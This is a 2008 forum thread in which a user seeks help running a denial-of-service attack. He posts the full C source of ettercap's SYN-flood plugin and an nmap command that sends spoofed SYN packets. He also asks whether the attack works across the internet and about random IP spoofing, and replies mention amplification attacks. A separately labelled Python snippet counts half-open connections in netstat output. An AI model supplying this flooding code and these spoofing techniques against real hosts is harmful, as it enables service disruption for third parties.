dos attack


27 replies to this topic

#1 1qwert

Posted 12 February 2008 - 10:03 PM

I would like to perform a DoS attack on one of my computers... the only tutorials I can find are on website/servers. . .

Can someone show me how. . . maybe a list of tools. . .

#2 kingospam

Posted 12 February 2008 - 10:15 PM

(dos|ddos) != hacking

syn floods with spoofed ip addresses

#3 1qwert

Posted 13 February 2008 - 02:59 PM

> (dos|ddos) != hacking
>
> syn floods with spoofed ip addresses

I think I understand the concept. . .

I could set up a game server on my network. . . how could I flood this server with SYN packets...

#4 friendless

Posted 13 February 2008 - 03:50 PM

The Wikipedia webpage: http://en.wikipedia.org/wiki/SYN_flood provides some decent information concerning this type of SYN flood.

There are many other ways to DoS someone as well.

I'm not sure of any Windows applications (which I'm automatically assuming you're using) that can/will do this for you automatically; I believe the typical attacks originate from *nix-based OSes.

#5 1qwert

Posted 13 February 2008 - 03:57 PM

> The Wikipedia webpage: http://en.wikipedia.org/wiki/SYN_flood provides some decent information concerning this type of SYN flood.
>
> There are many other ways to DoS someone as well.
>
> I'm not sure of any Windows applications (which I'm automatically assuming you're using) that can/will do this for you automatically; I believe the typical attacks originate from *nix-based OSes.

I have Backtrack 2 running from VirtualBox. . .

#6 friendless

Posted 13 February 2008 - 04:10 PM

I believe Backtrack's wiki and its forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...

I believe it comes with ettercap, which also has a DOS_ATTACK plugin.

EDIT:

Visit: http://backtrack.off...index.php/Tools

It shows all the tools that Backtrack 2 comes with (at least most).

I didn't see anything specific related to DoS attacking, however.

Edited by friendless, 13 February 2008 - 04:27 PM.


#7 1qwert

Posted 13 February 2008 - 05:27 PM

> I believe Backtrack's wiki and its forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...
>
> I believe it comes with ettercap, which also has a DOS_ATTACK plugin.
>
> EDIT:
>
> Visit: http://backtrack.off...index.php/Tools
>
> It shows all the tools that Backtrack 2 comes with (at least most).
>
> I didn't see anything specific related to DoS attacking, however.

I did try the dos_attack plugin within ettercap. . . works like a charm. . .

Does this work across the internet?

#8 Majest|c

Posted 13 February 2008 - 05:55 PM

> I believe Backtrack's wiki and its forums provide support for all utilities -- if you do a search you should be able to find something on doing FLOODING of different types...
>
> I believe it comes with ettercap, which also has a DOS_ATTACK plugin.
>
> EDIT:
>
> Visit: http://backtrack.off...index.php/Tools
>
> It shows all the tools that Backtrack 2 comes with (at least most).
>
> I didn't see anything specific related to DoS attacking, however.
>
> I did try the dos_attack plugin within ettercap. . . works like a charm. . .
>
> Does this work across the internet?

How did I know this was coming ... ? ...

#9 1qwert

Posted 13 February 2008 - 07:05 PM

http://www.bandwidthplace.com/

I had my sister do some speed tests and it worked like a charm. . .

#10 biosphear

Posted 13 February 2008 - 07:33 PM

> Does this work across the internet?
>
> How did I know this was coming ... ? ...

Because we were all there once... Then we found better things than performing DDoS over the net to others' networks.

Oh and to answer your question about the "does this work across the internet??"
Yes
I do not know about Ettercap but it does with other programs.

How about trying to make your own program that does a DDoS?
That would help you more in hacking because then you will know how a DDoS really works and what it takes to get it to do what it is doing. :D

biosphear

#11 kingospam

Posted 13 February 2008 - 07:54 PM

Most ISPs do not allow spoofed ip addresses.

#12 1qwert

Posted 13 February 2008 - 08:19 PM

> Does this work across the internet?
>
> How did I know this was coming ... ? ...
>
> Because we were all there once... Then we found better things than performing DDoS over the net to others' networks.
>
> Oh and to answer your question about the "does this work across the internet??"
> Yes
> I do not know about Ettercap but it does with other programs.
>
> How about trying to make your own program that does a DDoS?
> That would help you more in hacking because then you will know how a DDoS really works and what it takes to get it to do what it is doing. :D
>
> biosphear

ettercap did work. . . I take it you have to learn C or C++. . .

#13 1qwert

Posted 13 February 2008 - 08:43 PM

> Most ISPs do not allow spoofed ip addresses.

I would like to test this. . . I need a tip. . . how could my sister detect this DoS attack and then let me know if the IP was spoofed or not?

#14 biosphear

Posted 13 February 2008 - 08:46 PM

> ettercap did work. . . I take it you have to learn C or C++. . .

Yes.
C is always a good base to have when hacking.
Programming will help you in hacking even if you do not like to program.
I know programming has helped me in so many ways.

Remember you can know how something works but you should always know why it works, and how it is made possible.

biosphear

#15 1qwert

Posted 13 February 2008 - 09:48 PM

So how can I monitor this DoS attack? netstat?

Edit:
So I did check netstat -a and there were about 200 connections established. . .

Edited by 1qwert, 13 February 2008 - 10:25 PM.


#16 1qwert

Posted 13 February 2008 - 10:34 PM

Um. . . I have this idea. . . what if each and every IP was spoofed at random. . .

Edit: is this C++?
[codebox]/*
    dos_attack -- ettercap plugin -- Run a D.O.S. attack (based on Naptha)

    Copyright © ALoR & NaGA

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.

    $Id: dos_attack.c,v 1.8 2004/11/04 09:23:02 alor Exp $
*/


#include <ec.h>                        /* required for global variables */
#include <ec_plugins.h>                /* required for plugin ops */
#include <ec_hook.h>
#include <ec_packet.h>
#include <ec_send.h>
#include <ec_threads.h>

/* protos */
int plugin_load(void *);
static int dos_attack_init(void *);
static int dos_attack_fini(void *);
static void parse_arp(struct packet_object *po);
static void parse_tcp(struct packet_object *po);
EC_THREAD_FUNC(syn_flooder);

struct port_list {
   u_int16 port;
   SLIST_ENTRY(port_list) next;
};


/* globals */
static struct ip_addr fake_host;
static struct ip_addr victim_host;
SLIST_HEAD(, port_list) port_table;

/* plugin operations */
struct plugin_ops dos_attack_ops = {
   /* ettercap version MUST be the global EC_VERSION */
   ettercap_version: EC_VERSION,
   /* the name of the plugin */
   name: "dos_attack",
   /* a short description of the plugin (max 50 chars) */
   info: "Run a d.o.s. attack against an IP address",
   /* the plugin version. */
   version: "1.0",
   /* activation function */
   init: &dos_attack_init,
   /* deactivation function */
   fini: &dos_attack_fini,
};

/**********************************************************/

/* this function is called on plugin load */
int plugin_load(void *handle)
{
   return plugin_register(handle, &dos_attack_ops);
}

/******************* STANDARD FUNCTIONS *******************/

static int dos_attack_init(void *dummy)
{
   struct in_addr ipaddr;
   char dos_addr[MAX_ASCII_ADDR_LEN];
   char unused_addr[MAX_ASCII_ADDR_LEN];
   struct port_list *p;

   /* It doesn't work if unoffensive */
   if (GBL_OPTIONS->unoffensive) {
      INSTANT_USER_MSG("dos_attack: plugin doesn't work in UNOFFENSIVE mode\n");
      return PLUGIN_FINISHED;
   }

   /* don't show packets while operating */
   GBL_OPTIONS->quiet = 1;

   memset(dos_addr, 0, sizeof(dos_addr));
   memset(unused_addr, 0, sizeof(dos_addr));

   ui_input("Insert victim IP: ", dos_addr, sizeof(dos_addr), NULL);
   if (inet_aton(dos_addr, &ipaddr) == 0) {
      INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
      return PLUGIN_FINISHED;
   }
   ip_addr_init(&victim_host, AF_INET, (char *)&ipaddr);

   ui_input("Insert unused IP: ", unused_addr, sizeof(unused_addr), NULL);
   if (inet_aton(unused_addr, &ipaddr) == 0) {
      INSTANT_USER_MSG("dos_attack: Invalid IP address.\n");
      return PLUGIN_FINISHED;
   }
   ip_addr_init(&fake_host, AF_INET, (char *)&ipaddr);

   INSTANT_USER_MSG("dos_attack: Starting scan against %s [Fake Host: %s]\n", dos_addr, unused_addr);

   /* Delete the "open" port list just in case of previous executions */
   while (!SLIST_EMPTY(&port_table)) {
      p = SLIST_FIRST(&port_table);
      SLIST_REMOVE_HEAD(&port_table, next);
      SAFE_FREE(p);
   }

   /* Add the hook to "create" the fake host */
   hook_add(HOOK_PACKET_ARP_RQ, &parse_arp);

   /* Add the hook for SYN-ACK reply */
   hook_add(HOOK_PACKET_TCP, &parse_tcp);

   /* create the flooding thread */
   ec_thread_new("golem", "SYN flooder thread", &syn_flooder, NULL);

   return PLUGIN_RUNNING;
}


static int dos_attack_fini(void *dummy)
{
   pthread_t pid;

   /* Remove the hooks */
   hook_del(HOOK_PACKET_ARP_RQ, &parse_arp);
   hook_del(HOOK_PACKET_TCP, &parse_tcp);

   pid = ec_thread_getpid("golem");

   /* the thread is active or not ? */
   if (!pthread_equal(pid, EC_PTHREAD_NULL))
      ec_thread_destroy(pid);

   INSTANT_USER_MSG("dos_attack: plugin terminated...\n");

   return PLUGIN_FINISHED;
}

/*********************************************************/

/*
 * This thread first sends SYN packets to some ports (a little port scan)
 * then starts to flood active ports with other SYN packets.
 */
EC_THREAD_FUNC(syn_flooder)
{
   u_int16 sport = 0xe77e, dport;
   u_int32 seq = 0xabadc0de;
   struct port_list *p;

   /* init the thread and wait for start up */
   ec_thread_init();

   /* First "scan" ports from 1 to 1024 */
   for (dport=1; dport<1024; dport++) {
      send_tcp(&fake_host, &victim_host, sport++, htons(dport), seq++, 0, TH_SYN);
      usleep(1000);
   }

   INSTANT_USER_MSG("dos_attack: Starting attack...\n");

   /* Continue flooding open ports */
   LOOP {
      CANCELLATION_POINT();

      SLIST_FOREACH(p, &port_table, next)
         send_tcp(&fake_host, &victim_host, sport++, p->port, seq++, 0, TH_SYN);

      usleep(500);
   }

   return NULL;
}

/* Parse the arp packets and reply for the fake host */
static void parse_arp(struct packet_object *po)
{
   if (!ip_addr_cmp(&fake_host, &po->L3.dst))
      send_arp(ARPOP_REPLY, &po->L3.dst, GBL_IFACE->mac, &po->L3.src, po->L2.src);
}

/*
 * Populate the open port list and reply to
 * SYN-ACK packets from victim host
 */
static void parse_tcp(struct packet_object *po)
{
   struct port_list *p;

   /* Check if it's a reply to our SYN flooding */
   if (ip_addr_cmp(&fake_host, &po->L3.dst) ||
       ip_addr_cmp(&victim_host, &po->L3.src) ||
       po->L4.flags != (TH_SYN | TH_ACK))
      return;

   /* Complete the handshake with an ACK */
   send_tcp(&fake_host, &victim_host, po->L4.dst, po->L4.src, po->L4.ack, htonl( ntohl(po->L4.seq) + 1), TH_ACK);

   /* Check if the port is already in the "open" list... */
   SLIST_FOREACH(p, &port_table, next)
      if (p->port == po->L4.src)
         return;

   /* If not...put it in */
   SAFE_CALLOC(p, 1, sizeof(struct port_list));
   p->port = po->L4.src;
   SLIST_INSERT_HEAD(&port_table, p, next);

   INSTANT_USER_MSG("dos_attack: Port %d added\n", ntohs(p->port));
}

/* EOF */

// vim:ts=3:expandtab

[/codebox]

Edited by 1qwert, 13 February 2008 - 10:37 PM.


#17 inaequitas

Posted 13 February 2008 - 11:17 PM

> Um. . . I have this idea. . . what if each and every IP was spoofed at random. . .

Even less chance of working, ISPs are almost bound to block packages with source IPs (in the header, that is) that they know not to own. If you irk them, they might even try to find out who you are and what your deal is.

> Edit: is this C++?

That's C

#18 1qwert

Posted 14 February 2008 - 08:13 PM

Can you do a DoS attack with nmap? Just spoof the IP and send SYN packets???
-nmap -P0 -sS -p 135,139,445 -e eth0 -S 192.168.254.2 192.168.254.5
After doing this nmap scan I then check the netstat of the target and it shows SYN_RECEIVED.
Um. . . shouldn't there be a half open connection with those ports?

Edited by 1qwert, 14 February 2008 - 08:26 PM.
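
The netstat check asked about in posts #15 and #18, as an added example that is not part of any poster's message: SYN_RECEIVED (Windows) and SYN_RECV (Linux) are the half-open state, so monitoring the target means counting those rows per local port and per remote address. The sample lines are constructed, reusing the lab addresses and ports from the nmap command above; the function names and the threshold are assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: `netstat -an` style rows in Linux and Windows layouts,
# using the private lab addresses from the thread. Not captured from a real host.
SAMPLE = """\
tcp        0      0 192.168.254.5:445     192.168.254.2:59262   SYN_RECV
tcp        0      0 192.168.254.5:445     192.168.254.2:59263   SYN_RECV
tcp        0      0 192.168.254.5:445     192.168.254.2:59264   SYN_RECV
tcp        0      0 192.168.254.5:139     192.168.254.2:59270   SYN_RECV
tcp        0      0 192.168.254.5:22      192.168.254.9:40112   ESTABLISHED
  TCP    192.168.254.5:135      192.168.254.2:59301    SYN_RECEIVED
  TCP    192.168.254.5:135      192.168.254.7:49822    ESTABLISHED
"""

HALF_OPEN = {"SYN_RECV", "SYN_RECEIVED"}  # Linux / Windows names for the same state
# proto, optional Recv-Q/Send-Q (Linux only), local endpoint, remote endpoint, state
ROW = re.compile(r"^\s*tcp\S*\s+(?:\d+\s+\d+\s+)?(\S+)\s+(\S+)\s+([A-Z_0-9]+)", re.I)

def split_endpoint(endpoint):
    """Split 'addr:port' at the last colon, so IPv6 addresses survive."""
    host, _, port = endpoint.rpartition(":")
    return host, port

def half_open_summary(netstat_text):
    """Return {local_port: Counter(remote_host -> half-open count)}."""
    per_port = defaultdict(Counter)
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m or m.group(3).upper() not in HALF_OPEN:
            continue
        _, local_port = split_endpoint(m.group(1))
        remote_host, _ = split_endpoint(m.group(2))
        per_port[local_port][remote_host] += 1
    return dict(per_port)

def flag_ports(summary, threshold):
    """List (port, half_open_total, distinct_sources) for ports at or over threshold."""
    alerts = []
    for port, sources in sorted(summary.items(), key=lambda kv: int(kv[0])):
        total = sum(sources.values())
        if total >= threshold:
            alerts.append((port, total, len(sources)))
    return alerts

if __name__ == "__main__":
    for port, total, nsrc in flag_ports(half_open_summary(SAMPLE), threshold=3):
        print(f"port {port}: {total} half-open from {nsrc} source address(es)")
```

The third field separates one address holding many half-open entries from many addresses holding one or two each; netstat only shows the claimed source, so deciding whether it was spoofed still needs a packet capture on the target.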


#19 Spyril

Posted 15 February 2008 - 10:11 PM

Really, the only way to launch a successful DoS attack these days is with a large botnet at your command. One computer isn't going to do much damage on a professional grade server, unless you have the ability to send packets with spoofed IPs (which has been already stated to be unlikely).

#20 duper

Posted 15 February 2008 - 10:50 PM

Egress filtering isn't going to stop you from spoofing packets from source addresses that are within your subnet. Botnets are not necessary if you are using a traffic amplification attack (i.e. smurf, dns recursion, etc.) What I consider to be the seminal paper on SYN flooding is Phrack48-13.



